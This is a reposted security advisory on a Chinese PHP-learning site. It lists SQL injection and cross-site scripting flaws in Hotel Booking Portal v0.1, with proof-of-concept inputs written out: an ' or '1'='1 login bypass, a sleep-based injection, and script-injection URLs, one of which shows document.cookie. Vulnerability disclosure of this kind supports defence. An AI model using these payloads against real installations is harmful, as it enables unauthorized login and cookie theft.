来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] Hotel Booking Portal v0.1 Multiple Vulnerabilities作者 Yakir Wizman, yakir.wizman@gmail.com下载地址 http://sourceforge.net/projects/hbportal/I. 描述# ---------------------------------......
|
Hotel Booking Portal v0.1 Multiple Vulnerabilities
作者 Yakir Wizman, <yakir.wizman@gmail.com> 下载地址 http://sourceforge.net/projects/hbportal/ I. 描述 # ----------------------------------------------------------- # 1). A vulnerability exists in 'login.php' - Allows for 'SQL injection' of the 'email' and 'password' POST parameters. # 2). A vulnerability exists in 'searchresults.php' - Allows for 'SQL injection' of the 'country' POST parameter. # 3). A vulnerability exists in 'includes/languagebar.php' - Allows for 'Cross site scripting' of the 'window.location' js # 4). A vulnerability exists in 'administrator/login.php' - Allows for 'Cross site scripting' of the 'window.location' js # 5). A vulnerability exists in 'index.php' - Allows for 'Cross site scripting' of the 'lang' GET parameter. # # ----------------------------------------------------------- # II. 测试证明 # ----------------------------------------------------------- # 1). POST a form to login.php with the value of: # email set to : ' or '1'='1 # password set to : ' or '1'='1 # 2). POST to searchresults.php with the value of 'country' set to Armenia' and sleep(1)=' # 3). http://www.2cto.com /hbportal/includes/languagebar.php?xss=";</script><script>alert(1);</script><script> # 4). http://127.0.0.1/hbportal/administrator/login.php?xss=";</script><script>alert(1);</script><script> # 5). http://127.0.0.1/hbportal/index.php?lang=";</script><script>alert(document.cookie);</script><script> # ----------------------------------------------------------- |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
